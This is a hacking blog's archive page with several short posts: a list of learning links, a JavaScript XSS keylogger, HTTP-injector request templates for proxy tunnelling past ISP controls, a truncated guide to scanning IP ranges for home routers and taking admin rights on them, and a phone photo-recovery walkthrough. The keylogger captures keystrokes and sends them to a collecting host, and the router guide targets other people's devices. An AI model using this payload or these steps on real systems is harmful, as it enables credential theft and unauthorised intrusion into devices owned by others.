Skip to main content

Posts

Showing posts from February, 2018

Learn hacking Resources

Code Issues 0 Pull requests 1 Pulse Personal Resources.txt For Start...... http://teamultimate.in/ http://teamultimate.in/start-here/ http://null-byte.wonderhowto.com/ http://www.hackingarticles.in/ https://www.cybrary.it/ https://www.computersecuritystudent.com/ http://breakthesecurity.cysecurity.org/p/hacking-tutorials-for-beginners.html http://www.guru99.com/learn-penetration-testing.html http://back-track-linux.blogspot.in/2012/11/backtrack-penetration-testing-tutorial.html https://community.rapid7.com/docs/DOC-2248 https://www.soldierx.com/tutorials/Pentesting-Tutorial-1-Information-Gathering-Part-1-Nmap https://www.owasp.org/index.php/Category:How_To http://www.ranum.com/security/computer_security/editorials/dumb/index.html http://www.developer.com/java/data/article.php/10932_3667601_1 https://dzone.com/articles/10-steps-to-secure-software Cryptography Related Tutorials : https://developer.mozilla.org/en-US/docs/Archive/Security/Introduction_to_Public-Key_Cryp

XSS keylogger

Keylogger Xss js sample /keylogger // http://.com/lab/webapp/jfp/7 <script> document.forms[0].addEventListener('submit',function(){ new Image().src = "http://localhost:8000/?key="+cap; }); var cap = ''; window.addEventListener("keypress",function(event){ switch(event.which) {     case 13:         cap +='<ENTER>';         break;     case 9:         cap += "<TAB>";         break;     case 8:     if(cap.length != 0){             cap = cap.substring(0, cap.length-1);     }         break;     default:         cap +=String.fromCodePoint(event.which); } }); </script>

Http injector

Http Injector List of Injection methods 1.Normal CONNECT [host_port] [protocol][crlf]Host: domain.com [crlf][crlf] 2.Front Inject GET http://domain.com / HTTP/1.1[crlf]Host: domain.com [crlf][crlf]CONNECT [host_port] [protocol][crlf][crlf] 3.Front Query  CONNECT domain.com @[host_port][crlf]GET http://domain.com / [protocol][crlf]Host: domain.com [crlf][crlf] 4.Back Inject CONNECT [host_port] HTTP/1.1[crlf][crlf]GET http://domain.com / [protocol][crlf]Host: domain.com [crlf][crlf] 5.Back Query CONNECT [host_port]@domain .com[crlf]GET http://domain.com / [protocol][crlf]Host: domain.com [crlf][crlf] Troubleshoot♂¶ 🙅302 Error code - If you are  302 HTTP header code that means your ISP is redirecting your request to their captive portal page. Normally ISP blacklisted your remote proxy or the HTTP Payload. 🙅400 Error code - This indicate that your payload is invalid and can't be understand by remote proxy Connection timeout - It could be that your network connection i

Find any router password

♻️How to Hack the Home Routers and gain the Admin Rights… 💮Requirements: Port Scanner (zenmap,superscan or unicornscan.I use Zenmap) Web Browser (Chrome,Firfox or Safari) Internet Connection(Any kind of Internet connection) First of all I want to tell you why I use Zenmap because Nmap is the best friend of hackers and Zenmap is the graphical user interface of nmap. Instruction on How to Hack the Home Routers and gain the Admin Rights… 1. We should select an IP range. I have selected IP range that includes my public IP address. XXX.XXX.30.0-XXX.XXX.30.255 2. Now let’s scan for home routers. When you finished your scan, You can find IP addresses which has open ports such as http port(80), ftp port(21) and telnet port(23). I have found many IP addesses with port 80 is opened. So I stopped my scan. 3. Now you can access these addesses using your web browser because http port is opened and we need to find whether the web page is router log in page. 4. If you see the alert err

Recover deleted pic

How to recover deleted image or video from android (internal storage) without root ? STEP 1: DOWNLOAD AND INSTALL JIHOSOFT ANDROID PHONE RECOVERY AT YOUR COMPUTER. You could download the Windows version at: Android Recovery , download Mac version at: Android Recovery for Mac . After download, you will be lead to install the app at your computer. STEP 2: SELECT DATA GENRE THAT YOU NEED TO SCAN After installation, run the app at your PC. You will see the interface show you four options: “Mul”, “Database”, “WhatsApp”, “All”. Tap One of it according to your own demand. STEP 3: IDENTIFY ANDROID PHONE OR TABLET BY COMPUTER. First, connect your android device to computer via USB cable. Then, turn on USB debugging at android equipment. If the app failed to identify your equipment, install related USB driver at your computer. STEP 4: SCAN ANDROID DEVICE AND EXPECT THE RESULT After identification, click "Start" for scanning. Please be patient about the process